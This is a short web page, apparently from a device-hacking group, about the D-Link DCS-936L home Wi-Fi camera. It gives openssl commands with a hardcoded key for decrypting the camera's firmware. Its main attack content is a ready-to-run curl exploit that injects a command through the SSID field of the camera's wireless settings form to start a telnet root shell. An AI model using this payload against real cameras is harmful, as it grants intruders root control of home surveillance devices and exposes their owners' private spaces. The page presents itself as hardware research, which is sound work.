DLink 936L
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
DLink DCS-936L
The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that easily captures your entire room, wall-to-wall, in high-quality 720p. The built-in night vision, motion and sound detection, and a handy mobile app empower you with knowing exactly what is happening, day or night.
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the DLink DCS-936L Camera at Amazon
Encrypted Firmware Update
Firmware updates for the DCS-936L are encrypted with AES using a key, which is also encrypted.
After unpacking the firmware package, use the following command to decrypt the AES key:
openssl rsautl -decrypt -in aes.key.rsa -inkey "p.key" -out aes.key
Finally, use the following two commands to decrypt the firmware packages:
openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.aes -out "update" || exit
openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.bin.aes -out "update.bin" || exit
Post Auth Root
Command Injection: Post auth root via arbitrary command injection due to improper sanitization of the SSID field in the wifi configuration form.
curl -i -s -k -v -X 'POST' -H 'Host: 10.255.255.1' \ -H Referer: http://10.255.255.1/eng/admin/adv_wireless.cgi \ -H 'Cookie: language=eng; usePath=null' \ -H 'Authorization: Basic <CREDS>' \ --data 'wireless=1&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&mode=0&optSecurity=0&optEncryption=TKIP&key=&extAntenna=0&channel=6' \ 'http://10.255.255.1/eng/admin/adv_wireless.cgi'